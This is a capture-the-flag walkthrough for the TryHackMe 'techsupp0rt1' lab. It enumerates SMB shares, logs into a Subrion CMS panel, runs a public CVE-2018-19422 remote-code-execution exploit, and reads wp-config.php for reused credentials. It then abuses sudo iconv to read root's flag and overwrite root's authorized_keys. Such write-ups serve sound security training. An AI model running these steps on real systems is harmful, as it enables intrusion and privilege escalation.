Room Link: https://tryhackme.com/room/techsupp0rt1
Initial Scan
Kali
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
gobuster didn't find anything and the home page was just the default ubuntu page. Couldn't find anything of interest.
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/445 - SMB
Kali
smbclient -L //$VICTIM/
smbclient \\\\$VICTIM\\websvr
smb: \> ls
smb: \> prompt
smb: \> mget *
I used Cyberchef and it was able to decode the creds
TCP/80 - HTTP
I was able to access the subrion page from panel as mentioned in the message as subrion by itself doesn't work.
Username: admin
Password: Scam2021
Shell
Exploit: https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE
Since it's using Subrion CMS v4.2.1 I looked for exploits and found one for a rce
sudo apt-get install python3-bs4
git clone https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE.git
cd CVE-2018-19422-SubrionCMS-RCE/
sudo python3 SubrionRCE.py -u http://$VICTIM/subrion/panel/ -l admin -p Scam2021
Victim
cat /var/www/html/wordpress/wp-config.php
The hacker reused the password for both wordpress and ssh.
Kali
ssh scamsite@$VICTIM
Password: ImAScammerLOL!123!
Option #1
Just get flag
LFILE=/root/root.txt
sudo iconv -f 8859_1 -t 8859_1 "$LFILE"
Privilege Escalation
Kali
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub
Victim
LFILE=/root/.ssh/authorized_keys
echo "$YOURKEY" | sudo iconv -f 8859_1 -t 8859_1 -o "$LFILE"
Kali
